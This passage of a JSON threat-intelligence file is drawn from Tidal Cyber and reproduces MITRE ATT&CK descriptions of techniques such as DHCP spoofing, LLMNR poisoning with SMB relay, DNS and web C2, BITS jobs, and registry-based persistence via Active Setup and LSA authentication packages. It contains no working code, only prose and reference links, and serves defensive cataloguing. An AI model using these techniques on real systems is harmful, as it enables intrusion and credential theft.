client broadcasts a `DISCOVER` message.\n\n2. The server responds with an `OFFER` message, which includes an available network address. \n\n3. The client broadcasts a `REQUEST` message, which includes the network address offered. \n\n4. The server acknowledges with an `ACK` message and the client receives the network configuration parameters.\n\nAdversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers.[[new_rogue_DHCP_serv_malware](https://app.tidalcyber.com/references/8e0a8a9a-9b1f-4141-b595-80b98daf6b68)][[w32.tidserv.g](https://app.tidalcyber.com/references/9d4ac51b-d870-43e8-bc6f-d7159343b00c)] Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network.\n\nDHCPv6 clients can receive network configuration information without being assigned an IP address by sending a INFORMATION-REQUEST (code 11) message to the All_DHCP_Relay_Agents_and_Servers multicast address.[[rfc3315](https://app.tidalcyber.com/references/9349f864-79e9-4481-ad77-44099621795a)] Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations.\n\nRather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e, [Service Exhaustion Flood](https://app.tidalcyber.com/technique/03619027-8a54-4cb2-8f1d-38d476edbdd8)) by generating many broadcast DISCOVER messages to exhaust a network’s DHCP allocation pool. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1557.003" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "52dabfcc-b7a4-4334-9014-ab9d82f5527b", + "value": "DHCP Spoofing" + }, + { + "description": "By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. \n\nLink-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. [[Wikipedia LLMNR](https://app.tidalcyber.com/references/e06d8b82-f61d-49fc-8120-b6d9e5864cc8)][[TechNet NetBIOS](https://app.tidalcyber.com/references/f756ee2e-2e79-41df-bf9f-6492a9708663)]\n\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323) and crack the hashes offline through [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) to obtain the plaintext passwords.\n\nIn some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.[[byt3bl33d3r NTLM Relaying](https://app.tidalcyber.com/references/34deeec2-6edc-492c-bb35-5ccb1dc8e4df)][[Secure Ideas SMB Relay](https://app.tidalcyber.com/references/ac4b2e91-f338-44c3-8950-435102136991)] Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response. \n\nSeveral tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://app.tidalcyber.com/software/2a5ea3a7-9873-4a2e-b4b5-4e27a80db305).[[GitHub NBNSpoof](https://app.tidalcyber.com/references/4119091a-96f8-441c-b66f-ee0d9013d7ca)][[Rapid7 LLMNR Spoofer](https://app.tidalcyber.com/references/229b04b6-98ca-4e6f-9917-a26cfe0a7f0d)][[GitHub Responder](https://app.tidalcyber.com/references/3ef681a9-4ab0-420b-9d1a-b8152c50b3ca)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1557.001" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "b44a263f-76b2-4a1f-baeb-dd285974eca6", + "value": "LLMNR/NBT-NS Poisoning and SMB Relay" + }, + { + "description": "Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323), [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243), or replay attacks ([Exploitation for Credential Access](https://app.tidalcyber.com/technique/afdfa503-0464-4b42-a79c-a6fc828492ef)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.[[Rapid7 MiTM Basics](https://app.tidalcyber.com/references/33b25966-0ab9-4cc6-9702-62263a23af9c)]\n\nFor example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.[[ttint_rat](https://app.tidalcyber.com/references/f3e60cae-3225-4800-bc15-cb46ff715061)][[dns_changer_trojans](https://app.tidalcyber.com/references/082a0fde-d9f9-45f2-915d-f14c77b62254)][[ad_blocker_with_miner](https://app.tidalcyber.com/references/8e30f71e-80b8-4662-bc95-bf3cf7cfcf40)] Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)] [Downgrade Attack](https://app.tidalcyber.com/technique/257fffe4-d17b-4e63-a41c-8388936d6215)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.[[mitm_tls_downgrade_att](https://app.tidalcyber.com/references/af907fe1-1e37-4f44-8ad4-fcc3826ee6fb)][[taxonomy_downgrade_att_tls](https://app.tidalcyber.com/references/4459076e-7c79-4855-9091-5aabd274f586)][[tlseminar_downgrade_att](https://app.tidalcyber.com/references/8b5d46bf-fb4e-4ecd-b8a9-9c084c1864a3)]\n\nAdversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://app.tidalcyber.com/technique/e3be3d76-0a36-4060-8003-3b39c557f728) and/or in support of a [Network Denial of Service](https://app.tidalcyber.com/technique/e6c14a7b-1fb8-4557-83e7-7f5b89717311).", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + }, + { + "dest-uuid": "03ef726b-ac65-4e23-8130-9d299a3f458a", + "type": "similar" + }, + { + "dest-uuid": "52dabfcc-b7a4-4334-9014-ab9d82f5527b", + "type": "similar" + }, + { + "dest-uuid": "b44a263f-76b2-4a1f-baeb-dd285974eca6", + "type": "similar" + } + ], + "uuid": "d98dbf30-c454-42ff-a9f3-2cd3319cc0d9", + "value": "Adversary-in-the-Middle" + }, + { + "description": "Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nThe DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.[[PAN DNS Tunneling](https://app.tidalcyber.com/references/efe1c443-475b-45fc-8d33-5bf3bdf941c5)][[Medium DnsTunneling](https://app.tidalcyber.com/references/f31de733-406c-4348-b3fe-bdc30d707277)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1071.004" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "5c6c3492-5dbc-43ee-a3f2-ba1976d3b379", + "value": "DNS" + }, + { + "description": "Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMB, FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1071.002" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "a4f21b08-bf5b-4ba3-af69-cce01a467859", + "value": "File Transfer Protocols" + }, + { + "description": "Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1071.003" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "350fd3f9-2d62-498f-be62-fc4b9907ff02", + "value": "Mail Protocols" + }, + { + "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP/S[[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)] and WebSocket[[Brazking-Websockets](https://app.tidalcyber.com/references/fa813afd-b8f0-535b-9108-6d3d3989b6b9)] that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1071.001" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "9a21ec7b-9714-4073-9bf3-4df41995c698", + "value": "Web Protocols" + }, + { + "description": "Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. ", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + }, + { + "dest-uuid": "5c6c3492-5dbc-43ee-a3f2-ba1976d3b379", + "type": "similar" + }, + { + "dest-uuid": "a4f21b08-bf5b-4ba3-af69-cce01a467859", + "type": "similar" + }, + { + "dest-uuid": "350fd3f9-2d62-498f-be62-fc4b9907ff02", + "type": "similar" + }, + { + "dest-uuid": "9a21ec7b-9714-4073-9bf3-4df41995c698", + "type": "similar" + } + ], + "uuid": "8a7afe43-b814-41b3-8bd8-e1301b8ba5b4", + "value": "Application Layer Protocol" + }, + { + "description": "Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.[[Prevailion DarkWatchman 2021](https://app.tidalcyber.com/references/449e7b5c-7c62-4a63-a676-80026a597fc9)] For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7)) to evade.[[ESET Grandoreiro April 2020](https://app.tidalcyber.com/references/d6270492-986b-4fb6-bdbc-2e364947847c)]\n\nAdversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c) commands and [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "3b2f435a-8666-43b5-9883-f2808eebd726", + "value": "Application Window Discovery" + }, + { + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.[[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1560.003" + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "41da2363-af05-46b8-990e-2cc749b5aac8", + "value": "Archive via Custom Method" + }, + { + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://app.tidalcyber.com/technique/68fed1c9-e060-4c4d-83d9-d8c817893d65) rarfile [[PyPI RAR](https://app.tidalcyber.com/references/e40d1cc8-b8c7-4f43-b6a7-c50a4f7bf1f0)], libzip [[libzip](https://app.tidalcyber.com/references/e7008738-101c-4903-a9fc-b0bd28d66069)], and zlib [[Zlib Github](https://app.tidalcyber.com/references/982bcacc-afb2-4bbb-9197-f44d765b9e07)]. Most libraries include functionality to encrypt and/or compress data.\n\nSome archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1560.002" + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "ccf06b4a-bc33-4db1-bc66-74a0a7c31451", + "value": "Archive via Library" + }, + { + "description": "Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.\n\nAdversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems. \n\nOn Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://app.tidalcyber.com/technique/cf76b79c-8226-4137-b3dd-8f516611b928)).[[diantz.exe_lolbas](https://app.tidalcyber.com/references/66652db8-5594-414f-8a6b-83d708a0c1fa)] xcopy on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://app.tidalcyber.com/software/2fe21578-ee31-4ee8-b6ab-b5f76f97d043) to Base64 encode collected data before exfiltration. \n\nAdversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.[[7zip Homepage](https://app.tidalcyber.com/references/fc1396d2-1ffd-4fd9-ba60-3f6e0a9dfffb)][[WinRAR Homepage](https://app.tidalcyber.com/references/c1334e4f-67c8-451f-b50a-86003f6e3d3b)][[WinZip Homepage](https://app.tidalcyber.com/references/dc047688-2ea3-415c-b516-06542048b049)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1560.001" + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "3042a254-a2a9-4cb9-9939-087a24c64907", + "value": "Archive via Utility" + }, + { + "description": "An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\n\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + }, + { + "dest-uuid": "41da2363-af05-46b8-990e-2cc749b5aac8", + "type": "similar" + }, + { + "dest-uuid": "ccf06b4a-bc33-4db1-bc66-74a0a7c31451", + "type": "similar" + }, + { + "dest-uuid": "3042a254-a2a9-4cb9-9939-087a24c64907", + "type": "similar" + } + ], + "uuid": "ebd3f870-c513-4fb0-b133-15ffc1f91db2", + "value": "Archive Collected Data" + }, + { + "description": "An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "2be5c67a-edae-4083-8b6d-f99eaa622ed4", + "value": "Audio Capture" + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. This functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8) and [Lateral Tool Transfer](https://app.tidalcyber.com/technique/3dea57fc-3131-408b-a1fd-ff2eea1d858f) to identify and move files, as well as [Cloud Service Dashboard](https://app.tidalcyber.com/technique/315ce434-ad6d-4dae-a1dd-6db944a44422) and [Cloud Storage Object Discovery](https://app.tidalcyber.com/technique/92761d92-a288-4407-a112-bb2720f07d07) to identify resources in cloud environments.", + "meta": { + "platforms": [ + "IaaS", + "Linux", + "macOS", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "107ad6c5-79b1-468c-9519-1578bee2ac49", + "value": "Automated Collection" + }, + { + "description": "Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. [[Cisco Traffic Mirroring](https://app.tidalcyber.com/references/1a5c86ad-d3b1-408b-a6b4-14ca0e572020)][[Juniper Traffic Mirroring](https://app.tidalcyber.com/references/a6f62986-0b62-4316-b762-021f1bb14903)]\n\nAdversaries may abuse traffic mirroring to mirror or redirect network traffic through other infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://app.tidalcyber.com/technique/b9d60848-388e-444c-9f22-2267ea61b5e9) or [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f).[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)][[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]\n\nMany cloud-based environments also support traffic mirroring. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.[[AWS Traffic Mirroring](https://app.tidalcyber.com/references/6b77a2f3-39b8-4574-8dee-cde7ba9debff)][[GCP Packet Mirroring](https://app.tidalcyber.com/references/c91c6399-3520-4410-936d-48c3b13235ca)][[Azure Virtual Network TAP](https://app.tidalcyber.com/references/3f106d7e-f101-4adb-bbd1-d8c04a347f85)]\n\nAdversaries may use traffic duplication in conjunction with [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323), [Input Capture](https://app.tidalcyber.com/technique/5ee96331-a7b7-4c32-a8f1-3fb164078f5f), or [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) depending on the goals and objectives of the adversary.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1020.001" + }, + "related": [ + { + "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023", + "type": "uses" + } + ], + "uuid": "c2fc2776-e674-46ff-8b8d-ecc90b8b1c26", + "value": "Traffic Duplication" + }, + { + "description": "Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. \n\nWhen automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://app.tidalcyber.com/technique/89203cae-d3f1-4eef-9b5a-29042eb05d19) and [Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88).", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023", + "type": "uses" + }, + { + "dest-uuid": "c2fc2776-e674-46ff-8b8d-ecc90b8b1c26", + "type": "similar" + } + ], + "uuid": "26abc19f-5968-45f1-aa1f-f35863a2f804", + "value": "Automated Exfiltration" + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) (COM).[[Microsoft COM](https://app.tidalcyber.com/references/edcd917d-ca5b-4e5c-b3be-118e828abe97)][[Microsoft BITS](https://app.tidalcyber.com/references/3d925a69-35f3-4337-8e1e-275de4c1783e)] BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.\n\nThe interface to create and manage BITS jobs is accessible through [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) and the [BITSAdmin](https://app.tidalcyber.com/software/52a20d3d-1edd-4f17-87f0-b77c67d260b4) tool.[[Microsoft BITS](https://app.tidalcyber.com/references/3d925a69-35f3-4337-8e1e-275de4c1783e)][[Microsoft BITSAdmin](https://app.tidalcyber.com/references/5b8c2a8c-f01e-491a-aaf9-504ee7a1caed)]\n\nAdversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://app.tidalcyber.com/technique/fa1507f1-c763-4af1-8bd9-a2fb8f7904be)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.[[CTU BITS Malware June 2016](https://app.tidalcyber.com/references/db98b15c-399d-4a4c-8fa6-5a4ff38c3853)][[Mondok Windows PiggyBack BITS May 2007](https://app.tidalcyber.com/references/7dd03a92-11b8-4b8a-9d34-082ecf09a6e4)][[Symantec BITS May 2007](https://app.tidalcyber.com/references/e5962c87-0d42-46c2-8757-91f264fc570f)] BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).[[PaloAlto UBoatRAT Nov 2017](https://app.tidalcyber.com/references/235a1129-2f35-4861-90b8-1f761d89b0f9)][[CTU BITS Malware June 2016](https://app.tidalcyber.com/references/db98b15c-399d-4a4c-8fa6-5a4ff38c3853)]\n\nBITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88).[[CTU BITS Malware June 2016](https://app.tidalcyber.com/references/db98b15c-399d-4a4c-8fa6-5a4ff38c3853)]", + "meta": { + "platforms": [ + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "6b278e5d-7383-42a4-9425-2da79bbe43e0", + "value": "BITS Jobs" + }, + { + "description": "Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.[[Klein Active Setup 2010](https://app.tidalcyber.com/references/cbdd6290-1dda-48af-a101-fb3db6581276)] These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nAdversaries may abuse Active Setup by creating a key under HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\ and setting a malicious value for StubPath. This value will serve as the program that will be executed when a user logs into the computer.[[Mandiant Glyer APT 2010](https://app.tidalcyber.com/references/bb336a6f-d76e-4535-ba81-0c7932ae91e3)][[Citizenlab Packrat 2015](https://app.tidalcyber.com/references/316f347f-3e92-4861-a075-db64adf6b6a8)][[FireEye CFR Watering Hole 2012](https://app.tidalcyber.com/references/6108ab77-e4fd-43f2-9d49-8ce9c219ca9c)][[SECURELIST Bright Star 2015](https://app.tidalcyber.com/references/59cba16f-91ed-458c-91c9-5b02c03678f5)][[paloalto Tropic Trooper 2016](https://app.tidalcyber.com/references/47524b17-1acd-44b1-8de5-168369fa9455)]\n\nAdversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to make the Registry entries look as if they are associated with legitimate programs.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1547.014" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "8bd564d2-a3f1-4367-8631-a2d2cb3a1f46", + "value": "Active Setup" + }, + { + "description": "Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.[[MSDN Authentication Packages](https://app.tidalcyber.com/references/e9bb8434-9b6d-4301-bfe2-5c83ceabb020)]\n\nAdversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ with the key value of \"Authentication Packages\"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1547.002" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "7ede5868-1109-4f22-abc7-9495658f7866", + "value": "Authentication Package" + }, + { + "description": "Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.[[Linux Kernel Programming](https://app.tidalcyber.com/references/70f31f19-e0b3-40b1-b8dd-6667557bb334)] \n\nWhen used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://app.tidalcyber.com/technique/cf2b56f6-3ebd-48ec-b9d9-835397acef89) that run with the highest operating system privilege (Ring 0).[[Linux Kernel Module Programming Guide](https://app.tidalcyber.com/references/ceefe610-0b26-4307-806b-17313d570511)] Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.[[iDefense Rootkit Overview](https://app.tidalcyber.com/references/c1aef861-9e31-42e6-a2eb-5151b056762b)]\n\nKernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload and kextunload commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.[[System and kernel extensions in macOS](https://app.tidalcyber.com/references/e5c4974d-dfd4-4c1c-ba4c-b6fb276effac)]\n\nSince macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as \"Legacy System Extensions\" since there is no System Extension for Kernel Programming Interfaces.[[Apple Kernel Extension 